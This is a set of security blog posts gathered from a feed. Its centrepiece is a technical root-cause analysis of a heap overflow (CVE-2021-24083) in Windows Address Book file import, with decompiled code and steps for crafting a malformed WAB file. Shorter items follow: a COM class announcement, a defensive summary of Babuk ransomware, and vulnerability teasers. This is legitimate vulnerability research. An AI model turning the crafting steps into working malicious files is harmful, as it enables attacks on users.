The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and it is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e, a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e, C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are in Unicode, encoded in the UTF16-LE format.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
          (bytes)
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

  • Text Record (Type: 0x84d0): A record containing a Unicode string.
  • Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record 

Similarly, each index record has the following structure

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e, each index record structure in succession) has an offset that points to a WAB record.

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record

The following fields are relevant:

  • The RecordProperties field is a succession of record property structures.
  • The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
                             (bytes)
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 filds in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

  • The aforementioned list is not exhaustive. For more property tag definitions, see this.
  • The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
  • In addition to the above, the following properties also exist; their usage in WAB is unknown.
    • PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
    • PtypNull (0x00000001): None: This property is a placeholder.
    • PtypUnspecified (0x00000000): Any: this property type value matches any type;

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
        (bytes)
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040


The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In case of fixed-sized properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount number of the Value field of the corresponding Simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

  • The Size is always 16.
  • The Value contains four 32-bit integers.

In case of variable-sized properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount number of Size and Value fields of the corresponding Simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings “foo” and “bar” in Unicode:

  • The Size is 14 00 00 00.
  • The Value field contains a concatenation of the following two byte-strings:
    • “foo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
    • “bar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). This latter function receives a pointer to a file as an argument and reads the contact header and extracts PropertyCount and DataLen. The function HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the function fails to implement security checks upon certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties where the property tag is unknown, while the function HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. As a result, it is possible to trick the function HrGetPropArrayFromBuffer() into parsing an unchecked contact property. As a result of parsing such a property, the function HrGetPropArrayFromBuffer() can be tricked into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:

[1]

if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )
  {

[2]
    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely
  }

[3]
  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the buffer received and the properties contained within. If the check is positive, then the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
    {
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
      {
        while ( remaining_buffer_bytes > 4 )        
        {

[4]

          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  
          {

[5]

            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 
            {                         

[6]
                                      
              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
              {
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        &c_ptr_to_property_value,
                                        ©_dword_2) )
                {
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                  {                                                   
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                  }
                }
                return security_check_result;
              }
            }
            else                                                         
            {
             
[7]

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
              {
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                {
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                  else
                    res = 8i64;
                }
                else
                {
                  res = 4i64;
                }
              }
              else
              {
                res = 2i64;
              }
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        
                                                                                     

              ptr_to_buffer += c_dword_2 + 12;
            }
          }
          else                                     
          {                                        

[8]

            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          }
    LABEL_33:
          if ( !--l_header_dword_3 )
            break;
        }
      }
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;
    }

At [4] the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e, properties with tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

  1. If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
  2. A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
  3. The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e, properties with tag equal or higher than 0x1000) execution continues at [5] and the following is done.

For variable length composite properties (if the property tag is equal to 0x1102 (PtypMultipleBinary) or equal or smaller than 0x101f (PtypMultipleString)), the code at [6] does the following:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
  3. For each nested property, the function SecurityCheckSingleValue() is called. It:
    1. Performs a security check on the nested property.
    2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
  4. The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (if the property tag in question is different from 0x1102 (PtypMultipleBinary) and larger than 0x101f (PtypMultipleString)), the following happens starting at [7]:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size is compared to the remaining buffer length to avoid overrunning the buffer.
  3. The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
  4. The Size is divided by NestedPropCount to obtain the size of each nested property.
  5. The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
  6. The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated property size is zero, the buffer pointer is advanced by the size of the property value, as described by the header. The buffer is advanced regardless of the property size and by advancing the buffer, the security check permits the value of the parent property (which may include subproperties) to stay unchecked. For the security check to pass the result of the division performed on Step 4 for fixed-length composite properties must be zero. Therefore for an unknown or non-processable property to pass the security check, NestedPropCount must be larger than Size. Note that since the size of any property in bytes is at least two, NestedPropCount must always be no larger than half of Size, and therefore, the aforementioned division must never be zero in benign cases.

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal of the number of properties (as given by the contact header) and is allocated in the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
    {
        ret = -2147024809;
        goto LABEL_71;
    }
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;

[9]

    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x40u,
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
    {
        ERROR_INSUFICIENT_MEMORY:
        ret = 0x8007000E;
        goto LABEL_71;
    }

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures are initialized and their property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, advancing the property a pointer to the next property with the property header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)¤t_property_tag, 0xCu) )
    {
      if ( v16 < 4 )
        break;
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
        break;
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )
      {

[10]

        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
        {
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
            goto ERROR_INSUFICIENT_MEMORY;
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx].Value.at + 1);
        }
        else
        {
    LABEL_79:

[11]
                                           
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
            goto ERROR_INSUFICIENT_MEMORY;
        }
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];
      }
      else
      {
    LABEL_56:               

[12]
           
        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      }
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;
    }

[Truncated]

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;
      }

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the specific loop iteration is not a simple property, the following code is executed. Notably, when the following code is executed, the pointer DWORD* wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to point to the beginning of the property value, which is at the 4th 32-bit integer.

[13]

    if ( v16 < 4 )
    break;
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    break;
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;

[14]

    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    {
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    {
        [Truncated]
        
    }
    if ( (unsigned __int16)current_property_tag == 0x101F )
    {
        [Truncated]        
    }
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
    {
        if ( (unsigned __int16)current_property_tag == 0x1102 )
        {
        [Truncated]
        }
    }
    else
    {
    LABEL_80:

[15]

        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        goto ERROR_INSUFICIENT_MEMORY;
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        break;
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;
    }
    }

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;
    }

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e. >= 0x1000) with a tag not contemplated by the previous constants.

Although the processing logic of each type of property is irrelevant, an interesting fact is that if the property tag is not recognized, the buffer pointer has still been advanced to the end of the end of its header, and it’s never retracted. This happens if all of the following conditions are met:

  • The property tag is larger or equal than 0x1002.
  • The property tag is larger than 0x1007.
  • The property tag is different from 0x1014.
  • The property tag is different from 0x101e.
  • The property tag is different from 0x101f.
  • The property tag is different from 0x1102.
  • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

  • A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
  • HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.

Proof-of-Concept

In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

  • A nested property containing the following:
  • A tag of an unknown or unprocessable type, for example the tag 0x1058, with the following conditions:
    • Must be larger or equal than 0x1002.
    • Must be larger than 0x1007.
    • Must be different from 0x1014, 0x101e, 0x101f, and 0x1102.
    • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is non-zero.
    • Must be different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
    • NestedPropCount is larger than Size.
    • The Value of the composite property is empty.
    • A malicious simple property containing the following:
    • A property tag different from 0x1e, 0x1f, 0x40 and 0x48. For example, the tag 0x0.
    • The Size value is larger than 0x18 x NestedPropCount in order to overflow the _SPropValue array buffer.
    • An unspecified number of trailing bytes, that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.

Conclusion

Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book appeared first on Exodus Intelligence.

New Class: COM Programming

1 August 2021 at 15:54

Today I’m announcing a new training – COM (Component Object Model) Programming, to be held in November.

COM is a well established technology, debuted back in 1993, and is still very much in use. In fact, the Windows Runtime is based on an enhanced version of COM. There is quite a bit of confusion and misconceptions about COM, which is one reason I decided to offer this class.

The syllabus for the 3 day class can be found here. This is the first time I will be offering this class, and also will try a new format: 6 half-days instead of 3 full days.

When: November: 8, 9, 10, 11, 15, 16. 2pm to 6pm, UT. (Technically it’s more than 3 days, as with a full day there is a lunch break not present in half days). The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of the class. In case you have doubts, talk to me.

Obviously, participants in my Windows Internals and (especially) Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Registration will be different than previous classes:
Early bird (paid by September 30th): 500 USD (if paid by an individual), 1100 USD (if paid by a company).
Normal (paid after September 30th): 700 USD (if paid by an individual), 1300 USD (if paid by a company).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants. Multiple participants from the same company get a discount. Previous participants (individuals) of my classes get 10% off. I will reply with further instructions.

I hope to see you in November!

COMReuse

zodiacon

Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems?

29 July 2021 at 04:01

Co-written with Northwave’s Noël Keijzer.

Executive Summary

For a long time, ransomware gangs were mostly focused on Microsoft Windows operating systems. Yes, we observed the occasional dedicated Unix or Linux based ransomware, but cross-platform ransomware was not happening yet. However, cybercriminals never sleep and in recent months we noticed that several ransomware gangs were experimenting with writing their binaries in the cross-platform language Golang (Go).

Our worst fears were confirmed when Babuk announced on an underground forum that it was developing a cross-platform binary aimed at Linux/UNIX and ESXi or VMware systems. Many core backend systems in companies are running on these *nix operating systems or, in the case of virtualization, think about the ESXi hosting several servers or the virtual desktop environment.

We touched upon this briefly in our previous blog, together with the many coding mistakes the Babuk team is making.

Even though Babuk is relatively new to the scene, its affiliates have been aggressively infecting high-profile victims, despite numerous problems with the binary which led to a situation in which files could not be retrieved, even if payment was made.

Ultimately, the difficulties faced by the Babuk developers in creating ESXi ransomware may have led to a change in business model, from encryption to data theft and extortion.

Indeed, the design and coding of the decryption tool are poorly developed, meaning if companies decide to pay the ransom, the decoding process for encrypted files can be really slow and there is no guarantee that all files will be recoverable.

Coverage and Protection Advice

McAfee’s EPP solution covers Babuk ransomware with an array of prevention and detection techniques.

McAfee ENS ATP provides behavioral content focusing on proactively detecting the threat while also delivering known IoCs for both online and offline detections. For DAT based detections, the family will be reported as Ransom-Babuk!. ENS ATP adds 2 additional layers of protection thanks to JTI rules that provide attack surface reduction for generic ransomware behaviors and RealProtect (static and dynamic) with ML models targeting ransomware threats.

Updates on indicators are pushed through GTI, and customers of Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.

Initially, in our research the entry vector and the complete tactics, techniques and procedures (TTPs) used by the criminals behind Babuk remained unclear.

However, when its affiliate recruitment advertisement came online, and given the specific underground meeting place where Babuk posts, defenders can expect similar TTPs with Babuk as with other Ransomware-as-a-Service families.

In its recruitment posting Babuk specifically asks for individuals with pentest skills, so defenders should be on the lookout for traces and behaviors that correlate to open source penetration testing tools like winPEAS, Bloodhound and SharpHound, or hacking frameworks such as CobaltStrike, Metasploit, Empire or Covenant. Also be on the lookout for abnormal behavior of non-malicious tools that have a dual use, such as those that can be used for things like enumeration and execution, (e.g., ADfind, PSExec, PowerShell, etc.) We advise everyone to read our blogs on evidence indicators for a targeted ransomware attack (Part1Part2).

Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common amongst ransomware criminals:

  • E-mail Spearphishing (T1566.001). Often used to directly engage and/or gain an initial foothold, the initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the ransomware gangs to continue completely compromising a victim’s network. We have observed this in the past with Trickbot and Ryuk, Emotet and Prolock, etc.
  • Exploit Public-Facing Application (T1190) is another common entry vector; cyber criminals are avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door if you have the keys? Weakly protected Remote Desktop Protocol (RDP) access is a prime example of this entry method. For the best tips on RDP security, we would like to highlight our blog explaining RDP security.
  • Valid accounts can also be obtained via commodity malware such as infostealers, that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials are purchased by ransomware criminals to search for VPN and corporate logins. As an organization, robust credential management and multi-factor authentication on user accounts is an absolute must have.

When it comes to the actual ransomware binary, we strongly advise updating and upgrading your endpoint protection, as well as enabling options like tamper protection and rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

  • A recent forum announcement indicates that the Babuk operators are now expressly targeting Linux/UNIX systems, as well as ESXi and VMware systems
  • Babuk is riddled with coding mistakes, making recovery of data impossible for some victims, even if they pay the ransom
  • We believe these flaws in the ransomware have led the threat actor to move to data theft and extortion rather than encryption

Learn more about how Babuk is transitioning away from an encryption/ransom model to one focused on pure data theft and extortion in our detailed technical analysis.

The post Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems? appeared first on McAfee Blog.

Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438

By: voidsec
28 July 2021 at 12:00

Last week SentinelOne disclosed a “high severity” flaw in HP, Samsung, and Xerox printer’s drivers (CVE-2021-3438); the blog post highlighted a vulnerable strncpy operation with a user-controllable size parameter but it did not explain the reverse engineering nor the exploitation phase of the issue. With this blog post, I would like to analyse the vulnerability […]

The post Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438 appeared first on VoidSec.

Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions

10 November 2020 at 12:00
This post breaks the two-year silence of this blog, showcasing a selection of memory corruption vulnerabilities in Bitdefender’s anti-virus engine. The goal of binary packing is to compress or obfuscate a binary, usually to save space/bandwidth or to evade malware analysis. A packed binary typically contains a compressed/obfuscated data payload. When the binary is executed, a loader decompresses this payload and then jumps to the actual entry point of the (inner) binary.
❌
❌